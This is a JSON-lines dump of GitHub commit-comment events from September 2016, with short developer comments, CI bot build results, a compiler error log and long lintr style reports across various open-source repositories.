{"id":"4575863516","type":"CommitCommentEvent","actor":{"login":"mememori"},"repo":{"name":"ythecombinator/safadometro"},"payload":{"comment":{"id":19058985,"position":null,"line":null,"path":null,"commit_id":"9f3dd1b3cbfed73e31c4b1de90ba84366b5af2e2","created_at":"2016-09-16T19:16:21Z","updated_at":"2016-09-16T19:16:21Z","body":"🦆"}},"created_at":"2016-09-16T19:16:21Z"}
{"id":"4575866186","type":"CommitCommentEvent","actor":{"login":"CharlesWall"},"repo":{"name":"CharlesWall/node-cluster-balancer"},"payload":{"comment":{"id":19058989,"position":null,"line":null,"path":null,"commit_id":"ac815099cd18983c065195cf0564c2be1b48657f","created_at":"2016-09-16T19:16:55Z","updated_at":"2016-09-16T19:16:55Z","body":"ugh. you're right."}},"created_at":"2016-09-16T19:16:55Z"}
{"id":"4575870771","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19058995,"position":41,"line":69,"path":"otrv4.md","commit_id":"681601240eea147f72000007742039268565ff16","created_at":"2016-09-16T19:17:54Z","updated_at":"2016-09-16T19:17:54Z","body":"Is malleability considered a security property, or the method by which we achieve deniability? "}},"created_at":"2016-09-16T19:17:54Z"}
{"id":"4575871455","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19058999,"position":4,"line":77,"path":"Yupi.Messages/Handlers/Rooms/RoomSaveSettingsMessageEvent.cs","commit_id":"5bb46f9c28f3371659baaae8e1f5ea785a66a49a","created_at":"2016-09-16T19:18:04Z","updated_at":"2016-09-16T19:18:04Z","body":"Good!"}},"created_at":"2016-09-16T19:18:04Z"}
{"id":"4575874512","type":"CommitCommentEvent","actor":{"login":"jeannunes"},"repo":{"name":"modafocabr/Processo-de-Vendas"},"payload":{"comment":{"id":19059008,"position":null,"line":null,"path":null,"commit_id":"0d303e1a67f6f49a6a2aaf5f27118445db537804","created_at":"2016-09-16T19:18:43Z","updated_at":"2016-09-16T19:18:43Z","body":"bosta"}},"created_at":"2016-09-16T19:18:43Z"}
{"id":"4575875140","type":"CommitCommentEvent","actor":{"login":"jeannunes"},"repo":{"name":"modafocabr/Processo-de-Vendas"},"payload":{"comment":{"id":19059010,"position":null,"line":null,"path":null,"commit_id":"0d303e1a67f6f49a6a2aaf5f27118445db537804","created_at":"2016-09-16T19:18:51Z","updated_at":"2016-09-16T19:18:51Z","body":"vacilão"}},"created_at":"2016-09-16T19:18:51Z"}
{"id":"4575875280","type":"CommitCommentEvent","actor":{"login":"Genestealer"},"repo":{"name":"home-assistant/home-assistant.github.io"},"payload":{"comment":{"id":19059011,"position":null,"line":null,"path":null,"commit_id":"f78572b4cf73cd852643d01370555b0d05164e92","created_at":"2016-09-16T19:18:52Z","updated_at":"2016-09-16T19:18:52Z","body":"This example is now incorrect.\r\n\r\nI believe it should not be +delay: {% raw %}'00:{{ state.input_slider.minute_delay.state | int }}:00'{% endraw %}"}},"created_at":"2016-09-16T19:18:52Z"}
{"id":"4575877198","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19059012,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T19:19:19Z","updated_at":"2016-09-16T19:19:19Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2368 of 2370 tests passed, 0 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: AUD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T19:19:19Z"}
{"id":"4575881694","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19059024,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T19:20:20Z","updated_at":"2016-09-16T19:20:20Z","body":"I believe using hideobject turns off collision. Your old enhanced spawn selection used a metal floor with hideobject and the player would always fall through where the floor was. I could be wrong, but when I tried to convert the old ESS to 106, that's exactly what happened until I commented out the hideobject call."}},"created_at":"2016-09-16T19:20:20Z"}
{"id":"4575883450","type":"CommitCommentEvent","actor":{"login":"Dlackey75"},"repo":{"name":"Dlackey75/tutorial"},"payload":{"comment":{"id":19059032,"position":13,"line":13,"path":"LabPartner.java","commit_id":"ac9059c1165ba9a18b3118364eaffa11dae44b72","created_at":"2016-09-16T19:20:43Z","updated_at":"2016-09-16T19:20:43Z","body":"This is a constructor that creates a LabPartner object and sets instance variables"}},"created_at":"2016-09-16T19:20:43Z"}
{"id":"4575887396","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19059042,"position":6,"line":6,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T19:21:36Z","updated_at":"2016-09-16T19:21:36Z","body":"Решил проблему, см. 6efabf3 (не хватало _const_)"}},"created_at":"2016-09-16T19:21:36Z"}
{"id":"4575892154","type":"CommitCommentEvent","actor":{"login":"srinivasa1131"},"repo":{"name":"srinivasa1131/srinivasa1131.github.io"},"payload":{"comment":{"id":19059054,"position":null,"line":null,"path":null,"commit_id":"4d1ddd966c246d65e4d44528ca5b84228bdfae96","created_at":"2016-09-16T19:22:40Z","updated_at":"2016-09-16T19:22:40Z","body":"Update"}},"created_at":"2016-09-16T19:22:40Z"}
{"id":"4575892228","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19059055,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-16T19:22:41Z","updated_at":"2016-09-16T19:22:41Z","body":"по-моему тут надо на вектор заменить и все :)"}},"created_at":"2016-09-16T19:22:41Z"}
{"id":"4575895320","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19059059,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T19:23:23Z","updated_at":"2016-09-16T19:23:23Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T19:23:23Z"}
{"id":"4575895442","type":"CommitCommentEvent","actor":{"login":"vikram17000"},"repo":{"name":"processone/ejabberd"},"payload":{"comment":{"id":19059060,"position":null,"line":null,"path":null,"commit_id":"41386d718dbc5f6e846baaac568ba1cae5eb7ec4","created_at":"2016-09-16T19:23:25Z","updated_at":"2016-09-16T19:23:25Z","body":"I think its been erroneously marked as 16.09 - the change doesn't seem to have entered that tag. Thanks for correcting though."}},"created_at":"2016-09-16T19:23:25Z"}
{"id":"4575895747","type":"CommitCommentEvent","actor":{"login":"srinivasa1131"},"repo":{"name":"srinivasa1131/srinivasa1131.github.io"},"payload":{"comment":{"id":19059063,"position":null,"line":null,"path":null,"commit_id":"0034ef3e36cb74661198785fbdff42553be0386d","created_at":"2016-09-16T19:23:30Z","updated_at":"2016-09-16T19:23:30Z","body":"Update"}},"created_at":"2016-09-16T19:23:30Z"}
{"id":"4575897206","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059066,"position":11,"line":414,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:23:50Z","updated_at":"2016-09-16T19:23:50Z","body":"It should be \"..., let's see how to follow **pagination** links from them.\"."}},"created_at":"2016-09-16T19:23:50Z"}
{"id":"4575897483","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"jedisct1/libsodium-php"},"payload":{"comment":{"id":19059067,"position":null,"line":null,"path":null,"commit_id":"a2967c3caabd64219bdf774c9ea6031eb5a104b7","created_at":"2016-09-16T19:23:54Z","updated_at":"2016-09-16T19:23:54Z","body":"So where can I find the changelog now?"}},"created_at":"2016-09-16T19:23:54Z"}
{"id":"4575903130","type":"CommitCommentEvent","actor":{"login":"paragonie-scott"},"repo":{"name":"jedisct1/libsodium-php"},"payload":{"comment":{"id":19059079,"position":null,"line":null,"path":null,"commit_id":"a2967c3caabd64219bdf774c9ea6031eb5a104b7","created_at":"2016-09-16T19:25:12Z","updated_at":"2016-09-16T19:25:12Z","body":"https://pecl.php.net/package-changelog.php?package=libsodium&release=1.0.6"}},"created_at":"2016-09-16T19:25:12Z"}
{"id":"4575903240","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19059080,"position":38,"line":49,"path":"Yupi.Messages/Composer/Catalog/CatalogueIndexMessageComposer.cs","commit_id":"a16f4b4e0cbdc6770e48d72acc4496295fa33023","created_at":"2016-09-16T19:25:13Z","updated_at":"2016-09-16T19:25:13Z","body":"Unnecessary. We will not code Builders Club.\r\nI also recommend removing Builders Club icon from the Catalogue.\r\nIt's a totally useless feature for Habbo Retros.\r\n\r\nThe `BUILDER:String` constant it's not necessary since you can put _BUILDERS_CLUB_ Items in the Normal Catalogue.\r\n\r\nThat's my opinion."}},"created_at":"2016-09-16T19:25:13Z"}
{"id":"4575904609","type":"CommitCommentEvent","actor":{"login":"F0REacH"},"repo":{"name":"baidu/Paddle"},"payload":{"comment":{"id":19059083,"position":null,"line":null,"path":null,"commit_id":"aeb2d848d09b8b7529c6f749a9f543b02b8051c1","created_at":"2016-09-16T19:25:30Z","updated_at":"2016-09-16T19:25:30Z","body":"Failing to build with this commit - error: comparison between signed and unsigned integer expressions\r\n-- The CXX compiler identification is GNU 4.9.4\r\n-- The C compiler identification is GNU 4.9.4\r\n\r\n```\r\nIn file included from /home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/utils/Stat.h:26:0,\r\n                 from /home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/gserver/gradientmachines/RecurrentGradientMachine.cpp:15:\r\n/home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/gserver/gradientmachines/RecurrentGradientMachine.cpp: In member function ‘void paddle::RecurrentGradientMachine::createInFrameInfo(int, const paddle::Argument&, paddle::enumeration_wrapper::PassType)’:\r\n/home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/utils/Logging.h:136:45: error: comparison between signed and unsigned integer expressions [-Werror=sign-compare]\r\n #define CHECK_EQ(val1, val2) P_CHECK((val1) == (val2))\r\n                                             ^\r\n/home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/utils/Logging.h:110:44: note: in definition of macro ‘PREDICT_FALSE’\r\n #define PREDICT_FALSE(x) (__builtin_expect(x, 0))\r\n                                            ^\r\n/home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/utils/Logging.h:136:30: note: in expansion of macro ‘P_CHECK’\r\n #define CHECK_EQ(val1, val2) P_CHECK((val1) == (val2))\r\n                              ^\r\n/home/foreach/SOFT/BAIDU/PADDLE/Paddle/paddle/gserver/gradientmachines/RecurrentGradientMachine.cpp:678:5: note: in expansion of macro ‘CHECK_EQ’\r\n     CHECK_EQ(sequenceStartPositions.size(),\r\n\r\n```"}},"created_at":"2016-09-16T19:25:30Z"}
{"id":"4575906645","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059087,"position":87,"line":500,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:25:57Z","updated_at":"2016-09-16T19:25:57Z","body":"nitpick: \"pagination links\""}},"created_at":"2016-09-16T19:25:57Z"}
{"id":"4575907858","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19059090,"position":null,"line":null,"path":null,"commit_id":"0ee2012d3ac95dc8dae169f74cb52ee0f81170d9","created_at":"2016-09-16T19:26:13Z","updated_at":"2016-09-16T19:26:13Z","body":"Nice shot! Room Wordfilter it's really important."}},"created_at":"2016-09-16T19:26:13Z"}
{"id":"4575910734","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059100,"position":92,"line":505,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:26:52Z","updated_at":"2016-09-16T19:26:52Z","body":"\"Another interesting **thing** this spider ...\""}},"created_at":"2016-09-16T19:26:52Z"}
{"id":"4575913501","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059107,"position":94,"line":507,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:27:33Z","updated_at":"2016-09-16T19:27:33Z","body":"\"visiting the same **author** page multiple ...\""}},"created_at":"2016-09-16T19:27:33Z"}
{"id":"4575913570","type":"CommitCommentEvent","actor":{"login":"weiss"},"repo":{"name":"processone/ejabberd"},"payload":{"comment":{"id":19059108,"position":null,"line":null,"path":null,"commit_id":"41386d718dbc5f6e846baaac568ba1cae5eb7ec4","created_at":"2016-09-16T19:27:33Z","updated_at":"2016-09-16T19:27:33Z","body":"This change has been [reverted][1] in favor of a [better solution][2].\r\n\r\n[1]: https://github.com/processone/ejabberd/commit/8fd888eb2b7092bd47ddf339d8fb5b732202fd13\r\n[2]: https://github.com/processone/ejabberd/commit/4bd45bada70fc233bb87bc7ab099fc2407cea30b"}},"created_at":"2016-09-16T19:27:33Z"}
{"id":"4575914766","type":"CommitCommentEvent","actor":{"login":"manueljtejada"},"repo":{"name":"codemera/startupweekenddo"},"payload":{"comment":{"id":19059115,"position":39,"line":65,"path":"startupweekenddo/templates/includes/home-current-event.html","commit_id":"91c6e201d5ddb9ae3e207343b702d7b3b0193166","created_at":"2016-09-16T19:27:50Z","updated_at":"2016-09-16T19:27:50Z","body":"@warchiefx need your help implementing this"}},"created_at":"2016-09-16T19:27:50Z"}
{"id":"4575915505","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19059119,"position":6,"line":532,"path":"nixos/modules/installer/tools/nixos-generate-config.pl","commit_id":"1c9ac8aabc3105b14c762459bd14a5d53f691449","created_at":"2016-09-16T19:27:59Z","updated_at":"2016-09-16T19:27:59Z","body":"> The default for this is /boot/, why does this need changing?\r\n\r\n1) Most comments that are generated by `nixos-generate-config` aren't setting the variables to their default values.\r\n2) I'm honestly not sure why `/boot` is a good default given that grub puts some stuff in `/boot/grub` that I think has no business being on the EFP partition… Maybe someone can educate me on that point.\r\n\r\n> Also this is pretty misleading since only non-EFI systems get this output\r\n\r\nOnly systems *booted* in legacy mode get this output. They could very well be EFI-capable systems.\r\n\r\n> if the script detects a EFI system it suggests systemd-boot instead\r\n\r\nI'd be in favor for unifying the 2 branches of the `if`-statement further by using GRUB for both EFI & legacy modes but that's a bigger change."}},"created_at":"2016-09-16T19:27:59Z"}
{"id":"4575917564","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19059124,"position":null,"line":null,"path":null,"commit_id":"fd12d351c73696ef03f384a7cc81545a0bac3dc2","created_at":"2016-09-16T19:28:27Z","updated_at":"2016-09-16T19:28:27Z","body":"@diraol can you see this new release (link bellow)? I did some changes.\r\nhttps://github.com/kytos/website/commit/bad9b1bea505d420aef0250e4c0e233ced18066e#all_commit_comments "}},"created_at":"2016-09-16T19:28:27Z"}
{"id":"4575918115","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19059126,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T19:28:34Z","updated_at":"2016-09-16T19:28:34Z","body":"The rollback is more worst than the fix. After the roll back I cant get out from swimming in the ground. I tested it on both taviana maps. I think it is a tavi bug and has something to do with the street texture or something like that. With the new solution Im totally stuck when logging out at the sabina central place. The last fix fixed that more.\r\nI changed the respawn_west coords to main island but it is always the same,  swimming in the ground. I did not get it why."}},"created_at":"2016-09-16T19:28:34Z"}
{"id":"4575920982","type":"CommitCommentEvent","actor":{"login":"StoneOffStones"},"repo":{"name":"StoneOffStones/plugin.video.xstream"},"payload":{"comment":{"id":19059136,"position":null,"line":null,"path":null,"commit_id":"fe14407aba3dc9ba0892c350c22078421a26fe01","created_at":"2016-09-16T19:29:14Z","updated_at":"2016-09-16T19:29:14Z","body":"Die Artefakte und die schlechteren Übergänge im Farbverlauf waren für mich der Grund wieso ich das Fanart in der besseren Qualität, also etwas größer, zum Addon hinzugefügt hatte."}},"created_at":"2016-09-16T19:29:14Z"}
{"id":"4575928160","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19059149,"position":null,"line":null,"path":null,"commit_id":"549560db1e77f4481324b3d7f88e41c6303f0f82","created_at":"2016-09-16T19:30:43Z","updated_at":"2016-09-16T19:30:43Z","body":"[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             ~^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/tmp/atom-linter_86874JxgdvzSaARw/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_86874JxgdvzSaARw/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T19:30:43Z"}
{"id":"4575928208","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19059150,"position":null,"line":null,"path":null,"commit_id":"549560db1e77f4481324b3d7f88e41c6303f0f82","created_at":"2016-09-16T19:30:43Z","updated_at":"2016-09-16T19:30:43Z","body":"[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             